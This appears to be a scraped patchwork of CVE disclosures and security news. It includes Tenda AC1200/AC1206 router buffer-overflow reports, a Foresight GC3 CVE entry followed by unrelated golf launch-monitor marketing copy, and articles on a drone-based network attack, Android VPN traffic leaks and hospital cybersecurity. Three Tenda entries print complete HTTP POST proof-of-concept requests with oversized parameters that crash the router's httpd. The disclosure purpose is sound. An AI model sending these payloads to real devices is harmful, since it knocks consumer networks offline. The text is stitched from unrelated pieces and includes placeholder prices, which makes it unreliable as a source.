Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x47c5dc function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.

**Vulnerability Report**

Vendor: Tenda

Product: AC1200 Smart Dual-Band WiFi Router

Version: US\_AC6V2.0RTL\_V15.03.06.51\_multi\_TDE01(Download Link:https://www.tendacn.com/download/detail-3794.html)

Type: Buffer Overflow

**Vulnerability description**

We found a buffer overflow vulnerability in AC1200 with firmware which was released recently, allows remote attackers to destory the execution memory from a crafted request. This can cause a denial of service or impact code execution.

**Remote Command Execution**

In httpd binary:

In function 0x47c5dc, take the content before ';' of recv_buf to pcVar2 through strchr. If the content is not empty, then take the content after the 'set' and store it in pcVar2.

Then use strchr to take the content after '=' of pcVar2 and store it in pvalue. But the length of pvalue is not checked and copied into value by strcpy. The length of value is 1024 bytes. The original recv_buf length is 4096 bytes, so the length of the pvalue may be greater than 1024 bytes. This results in a buffer overflow.

CVE-2022-41482: Bug-Report/tenda-AC6- 0x47c5dc_value.md at main · Davidteeri/Bug-Report

Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x47ce00 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.

**Vulnerability Report**

Vendor: Tenda

Product: AC1200 Smart Dual-Band WiFi Router

Version: US\_AC6V2.0RTL\_V15.03.06.51\_multi\_TDE01(Download Link:https://www.tendacn.com/download/detail-3794.html)

Type: Buffer Overflow

**Vulnerability description**

We found a buffer overflow vulnerability in AC1200 with firmware which was released recently, allows remote attackers to destory the execution memory from a crafted request. This can cause a denial of service or impact code execution.

**Remote Command Execution**

In httpd binary:

In function 0x47ce00, name is allocated a buffer of 0x1000 bytes for storing a variable. This value is passed to the 0x47bd44 (rtl\_hw\_add\_list) function for processing.

In 0x47bd44, the name is copied to new through strcpy. The buffer size allocated by new is 0x488. There is no length check for that before copying. This can lead to buffer overflows.

CVE-2022-41485: Bug-Report/tenda-AC6- 0x47ce00.md at main · Davidteeri/Bug-Report

Foresight GC3 Launch Monitor 1.3.15.68 ships with a Target Communication Framework (TCF) service enabled. This service listens on a TCP port on all interfaces and allows for process debugging, file system modification, and terminal access as the root user. In conjunction with a hosted wireless access point and the known passphrase of FSSPORTS, an attacker could use this service to modify a device and steal intellectual property.

**Industry-leading performance insight and true-to-life simulation in our most approachable offering yet.**

From $6,995 or $???/mo

Handle

**Take it for a spin.**

Three precision cameras for both ball and club data. Four ways to connect. A touch screen display that’s easy to read indoors and out. Add it all up and you’ve got the ultimate personal launch monitor.

**Ready for anything**

**On the Range**

From the PGA Tour to the home simulator, our GC line of launch monitors is the most awarded, most trusted, and best selling professional-grade launch monitor line ever. When performance matters, the choice is easy — GC3.

**In the Studio**

Our award-winning simulation packages, combined with the GC3, make the game’s best indoor experience possible — now at an almost impossibly low price.

**Precision inside — and out.**

Thanks to the advanced photometric technology inside, the GC3 remains accurate and reliable both on the range and in your home simulator. No other launch monitor tech compares with the GC line when it comes to delivering real-time performance insight.

**Your game   
reimagined.**

The GC3 isn't just a weapon of mass instruction, it's your gateway to a whole new gaming experience. Combine it with our FSX performance and gaming suite and enjoy hundreds of world-class courses, skill-building games, and global leagues and competitions.

​

**Which launch monitor is right for you?**

No other launch monitor tech compares with the GC line when it comes to delivering real-time performance insight. Which model best fits your play?

**Compare Launch Monitors**

Read More

**Compare Launch Monitors**

​

**GC3**

From $6,995? or $???/mo

Buy now

**GCQuad**

From $11,000 or $166/mo

Buy now Learn more

Ball Data

Launch Angle  
Side Angle  
Ball Speed  
Total Spin  
Carry  
Side Spin/Spin Axis

Launch Angle  
Side Angle  
Ball Speed  
Total Spin  
Carry  
Side Spin/Spin Axis

Club Data

Club Head Speed  
Smash Factor  
Club Path  
Angle of Attack  
\-  
\-  
\-  
\-

Club Head Speed  
Smash Factor  
Club Path  
Angle of Attack  
Loft/Lie  
Face Angle  
Impact Location  
Closure Rate

Putting Analysis

No

Yes

Hitting Zone

7” x 10”

18” x 14”

Cameras

3 (Triscopic)

4 (Quadrascopic)

Light Source

Integrated Infrared

Integrated Infrared

Battery

Fixed Lithium Ion

Interchangeable Lithium Ion

Display Type

Standard Transflective LCD  
(Touchscreen Enabled)

Premium Reflective Memory Display  
(Outdoor Viewability)

Fold-Out Ground Stabilizer

No

Yes

Finish Material

Thermo Plastic  
Rubberized Material

Thermo Plastic Rubberized Material with Premium Metallic Finish

Barometric Sensor

Yes

Yes

Accelorometer

Yes

Yes

WiFi

Yes

Yes

Ethernet

Yes

Yes

USB Type

C

C

Bluetooth

No

Yes

Alignment Stick

Included

Included

Warranty

1-year US

2-year US

Size

6” (w) x 12” (h) x 5” (d)

7” (w) x 12.5” (h) x 4” (d)

Weight

5lbs / 2.3kg

7.5lbs / 3.8kg

Battery Life

5-7 Hours

6-8 Hours

**Ready?  
Let's do this.**

The GC3 is the Game Changer you've been holding out for. So take the next step and turn your game goals into a reality — it all starts with the press of a button.

From $6,995 or $???/mo

**It's a Game Changer**

Contact Foresight Sports today to learn more.

CVE-2022-40187: GC3 | Foresight Sports

Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 was discovered to contain a stack overflow via sched_end_time parameter.

Affect device: Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01(https://www.tenda.com.cn/download/detail-2766.html)

Vulnerability Type: Heap overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/openSchedWifi page which influences the lastest version of Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01 (https://www.tenda.com.cn/download/detail-2766.html)

The vulnerability exists in the file /bin/httpd , function **setSchedWifi**.

User control pointer parameter _**sched\_end\_time**_ in web requesting; _**wlan\_switch**_ is an array on the heap, and using strcpy to copy _**sched\_end\_time**_ to _**wlan\_switch**_ without length limit will cause heap overflow.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

POST /goform/openSchedWifi HTTP/1.1
Host: 192.168.23.133
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9
Cookie: password\=byn5gk
Connection: close
Content\-Length: 265

schedWifiEnable\=0&schedEndTime\=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-42081: myCVE/AC1206-5.md at main · tianhui999/myCVE

Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 was discovered to contain a heap overflow via sched_start_time parameter.

Affect device: Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01(https://www.tenda.com.cn/download/detail-2766.html)

Vulnerability Type: Heap overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/openSchedWifi page which influences the lastest version of Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01 (https://www.tenda.com.cn/download/detail-2766.html)

The vulnerability exists in the file /bin/httpd , function **setSchedWifi**.

User control pointer parameter _**sched\_start\_time**_ in web requesting; _**wlan\_switch**_ is an array on the heap, and using strcpy to copy _**sched\_start\_time**_ to _**wlan\_switch**_ without length limit will cause heap overflow.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

POST /goform/openSchedWifi HTTP/1.1
Host: 192.168.23.133
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9
Cookie: password\=byn5gk
Connection: close
Content\-Length: 1552

schedWifiEnable\=0&schedStartTime\=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-42080: myCVE/AC1206-4.md at main · tianhui999/myCVE

Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 was discovered to contain a stack overflow via the function formWifiBasicSet.

Affect device: Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01(https://www.tenda.com.cn/download/detail-2766.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/WifiBasicSet page which influences the lastest version of Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01 (https://www.tenda.com.cn/download/detail-2766.html)

The vulnerability exists in the file /bin/httpd , function **formWifiBasicSet**.

User control pointer parameter _**security\_5g**_ in web requesting; _**param\_5g**_ is an array on the stack, and using strcpy to copy _**security\_5g**_ to _**param\_5g**_ without length limit will cause stack overflow.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

POST /goform/WifiBasicSet HTTP/1.1
Host: 192.168.23.133
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9
Cookie: password\=rjy5gk
Connection: close
Content\-Length: 3660

security\_5g\=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-42079: myCVE/AC1206-3.md at main · tianhui999/myCVE

Drone-based cyberattacks to spy on corporate targets are no longer hypothetical, one incident from this summer shows.

Once limited to abstract academic conversation among cybersecurity enthusiasts, drones loaded with cyber-spying equipment are now being used in the real world to breach networks and steal information.

Cybersecurity researcher Greg Linares shared a Twitter thread on Oct. 10 providing an overview of a drone-based cyberattack he was privy to over the summer.

He explained it started when an unnamed financial company picked up unusual traffic on its network. A trace of the Wi-Fi signal behind the network activity led the threat hunters to the roof, where two drones were found. One was a modified DJI Phantom carrying what Linares called a "modified Wifi Pineapple device"; the other was a likewise modified DJI Matrice 600 drone loaded with "a Raspberry Pi, batteries, a GPD mini laptop, a 4G modem and another Wi-Fi device," he added.

The cyberattack was partially successful, allowing attackers to target the internal Atlassian Confluence page to get access to credentials and other devices, Linares said. However, the threat hunters found one of the drones damaged, but still functioning.

"The attack was a limited success, and it appears that once the attackers were discovered, they accidentally crashed the drone on recovery," Linares tweeted.

He explained this sort of drone exploit delivery attack probably cost no more than $15,000 to put together.

"Attackers are spending this range of budget in order to target your internal devices and are ok with burning it," he cautioned. "This is the third real-world drone based attack I have encountered in two years."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Airborne Drones Are Dropping Cyber-Spy Exploits in the Wild

The platform lets network connectivity data escape outside of the secure tunnel when connected to a public network, posing a "privacy concern" for users with "certain threat models," researchers said.

Android devices are leaking certain traffic when a mobile device is connected to a Wi-Fi network, even when features aimed to protect data being sent over the public Internet by using virtual private networks (VPNs) are enabled.

The issue could poke a hole in a user's ability to remain anonymous when using a VPN to encrypt data being sent from an Android device over a public Wi-Fi network, allowing a would-be attacker to monitor a user's traffic and even pinpoint someone's location, researchers noted.

A security audit conducted by Mullvad VPN identified the issue, which it reported to Google's Android team. It found that the Android mobile OS — which has nearly 3 billion users worldwide — is sending connectivity checks outside the VPN tunnel.

"It does this every time the device connects to a Wi-Fi network, even when the _Block connections without VPN_ setting is enabled," they wrote in the post. "The connection check traffic can be observed and analyzed by the party controlling the connectivity check server and any entity observing the network traffic.

This could allow a threat actor to derive information beyond merely the fact that the Android device is connected, such as a user's location if "combined with data such as Wi-Fi access point locations," the Mullvad researchers noted.

Android, for its part, says the function is working as intended, and that no fix is necessary.

**Defending Default Behavior**

It makes sense for Android to send connectivity data traffic by default, the Mullvad researchers acknowledged, such as when there is a captive portal on the network, they said.

In this case, the connection will be unusable until the user has logged in to it, "so most users will want the captive portal check to happen and allow them to display and use the portal," the researchers wrote.

Still, as there seems to be no way to prevent Android from leaking traffic, the issue remains unresolved and potentially a risk for some users, the researchers said. Moreover, Android's current documentation about how the OS blocks connections without a VPN is misleading, they wrote, even if a user is "fine with some traffic going outside the VPN tunnel."

As it would require a "sophisticated actor" to use connectivity checks against someone using an Android phone, "most of our users are probably unlikely consider it a significant risk," the researchers acknowledged.

But the feature as currently documented by Android gives a user the impression "that no traffic will leave the phone except through the VPN" when the feature is turned on, which is not the case, the Mullvad researchers said.

Previously, on Sept. 29, Mullvad had posted on Android IssueTracker suggesting a change to the documentation regarding the "Block connections without VPN" feature to alert users to potential data leakage.

To remedy this issue, researchers suggested adding "except connectivity checks" to documentation references that claim the feature allows people using a device or an IT admin to force all traffic to use the VPN, or blocks any network traffic that doesn't use the VPN for clarification. The issue remains pending.

Dark Reading has reached out to Android for comment.

**Connection Checks Working as Intended**

The researchers reported the mobile system's actual leaking of connectivity data to Android on its IssueTracker message board site. Android responded quickly that it was looking into it.

A Google engineer later defended the current state of the "Block connections without VPN" feature, responding that the status of the issue is "Won't Fix" as "this is working as intended" in a comment posted Oct. 6.

The engineer stated four reasons for declining to add an option in Android to disable connectivity checks. One is that the VPN might be actually relying on the result of these connectivity checks, while another is that the VPN may be a split tunnel, letting part of the traffic over the underlying network, or only affect a given set of apps.

Further, the connectivity checks are far from the only thing exempted from the VPN, as privileged apps can also bypass the VPN, and this is necessary for their operation in many cases, the engineered stated.

Finally, Google's position is that it's unclear as to what specific impact on privacy the issue has, as "connectivity checks reveal there is an Android device at this address, which is plenty clear from the L2 connection and from the traffic going over the VPN anyway," according to the engineer.

**High-Profile Risk**

Mullvad's point that the leak could pose a threat to some users certainly has validity, especially given the increased interest by state-sponsored threat actors to use spyware and other ways to monitor and even persecute high-profile Android users such as journalists, activists, academics, and politicians.

VPNs are meant to ensure that network connections using them encrypt Internet traffic over public networks, meaning that they use the IP address of a designated VPN service rather than someone's public IP address. This allows high-risk users who know they need extra security when their devices are connected to public Wi-Fi networks to hide their activity from prying eyes.

Mullvad acknowledged that there is nothing that the company or anyone else can do to fix the Android leaks if Google doesn't take action to change the OS.

However, there is one Android-based distribution, GrapheneOS, that gives users the option to disable connectivity checks within the mobile OS, the researchers said. With this feature enabled in devices using the distribution, Mullvad researchers said they could not observe the connections.

In light of this, the researchers reiterated their position that Google consider adopting this same ability to disable connectivity checks into stock Android, they concluded in their post.

Android Leaks Wi-Fi Traffic Even When VPN Protection Features Are On

By Owais Sultan
Hospitals and medical facilities are lucrative targets for hackers. It’s not enough anymore to keep software updated and…
This is a post from HackRead.com Read the original post: Cybersecurity Threats to Health Services: Why We Should Be Concerned

Hospitals and medical facilities are lucrative targets for hackers. It’s not enough anymore to keep software updated and make backups once a week. Instead, hospitals should ask questions like: “what is a VPN” and “what does a VPN do” to kick-start their journey to safer patient data.

Would you enjoy hearing about your most intimate medical issues on the evening news? It’s already happening. It will keep happening until hospitals, and medical service providers stop underestimating the cybersecurity threat landscape.

The statistics and news headlines are clear: hospitals and medical facilities are choice targets for hackers. Patients are starting to demand that medical services providers do everything they can to keep personal data safe.

Hospitals should be googling questions like “VPN meaning” and “what does a VPN do” to kick start their journey to safer patient data and privacy.

**Why do hackers target hospitals?**

The healthcare industry is highly vulnerable at five pressure points. Hackers know this. They design their attacks to push these buttons to get rapid economic rewards:

1.  A shutdown of medical appliances could kill patients and delay urgent medical  
    Treatment.  
    
2.  The loss of patient medical history could delay the treatment of medical  
    Conditions.  
    
3.  Public backlash and loss of patients’ trust.  
    
4.  The possibility of facing federal and criminal investigations and fines or  
    sanctions. Some medical providers are not equipped to install better security  
    controls, but many simply underestimate the risks.  
    
5.  Hackers can make quick cash from selling Personal Health Information (PHI),  
    which is worth more than ‘ordinary’ Personally Identifiable Information (PII).  
    You can change your credit card or even SSN, but you can’t change your  
    medical history of illnesses, treatments, or surgeries.

According to our sources, Credit cards and related information sell for $1-$2 on the dark web, but PHI can sell for more than $350. Hackers use these detailed medical records to falsify insurance claims, buy high-value drugs, or get medical procedures. 

**How do hackers threaten healthcare services?**

Most of the healthcare industry’s cybersecurity woes start with the weakest link: phishing attacks aimed at everyday workers.

**Phishing**

The first step to ransomware attacks and data breaches is to gain access to an employee’s login credentials. And they do this by carrying out phishing attacks. Cybercriminals bombard mailboxes with unsuspecting emails that contain malicious attachments or links that can download malware or steal login credentials.

They often use the hacked account of one employee to work their way up to someone in the organization that has access to the entire IT system.

**Data breaches**

A careless or overburdened employee may unintentionally click on a malicious link or even lose a device. In today’s work-from-everywhere environment, hackers can steal user credentials if an employee logs into the hospital’s system via a home or public Wi-Fi link without the protection of a virtual private network (VPN).

Once hackers gain access to a system, they can download patients’ healthcare and financial information, steal proprietary research, infiltrate the company’s finance system, divert funds or medical equipment and drugs, or even shut down the entire operation.

**Ransomware attacks**

A ransomware infection locks down your files and system and makes it completely inaccessible. The attacker then demands a ransom to unlock the files. The healthcare industry is particularly vulnerable to this type of attack because ransomware attacks can bring medical services to a complete halt. Medical emergencies can’t wait. The urgency of this situation sometimes forces hospitals to pay the ransom despite the FBI’s advice to the contrary.

**DDoS Attacks**

A Distributed-Denial-of-Service attack (DDoS attack) is when hackers bombard a targeted server with fake connection requests to overwhelm and force the server offline. DDoS attacks can bring every operation in a hospital to an abrupt halt and could even put lives at risk. The criminals usually demand a ransom to stop the attack.

**How can hospitals protect themselves?**

Cyberattacks on hospitals can halt clinical procedures, threaten the quality of patient care, and result in very serious data breaches. Clearly, standard security advice is not good enough. Hospitals should adopt a structured plan to invest in cybersecurity to defend their electronic infrastructure.

**Address the weakest link with cybersecurity Awareness training**

Train staff to view electronic communications as a potential attack surface. Cyber Threat Awareness programs can help to protect staff from phishing attacks and social engineering attempts.

**Enforce Password Security**

In a hospital’s high-pressure environment where staff often share devices and machines, users should have access to a sophisticated password management system to keep unauthorized users out.

**Install a Multi-Factor Authentication system**

Multi-Factor Authentication (MFA) is a secure, simple access control measure that could thwart most hacking attempts.

**Migrate to Ultra-Secure Cloud Computing**

Cloud computing is reliable, cheap, and easy to put in place, especially if outsourced. Reputable cloud storage providers meet HIPAA minimum requirements and can be tailored to meet specific storage and access control needs.

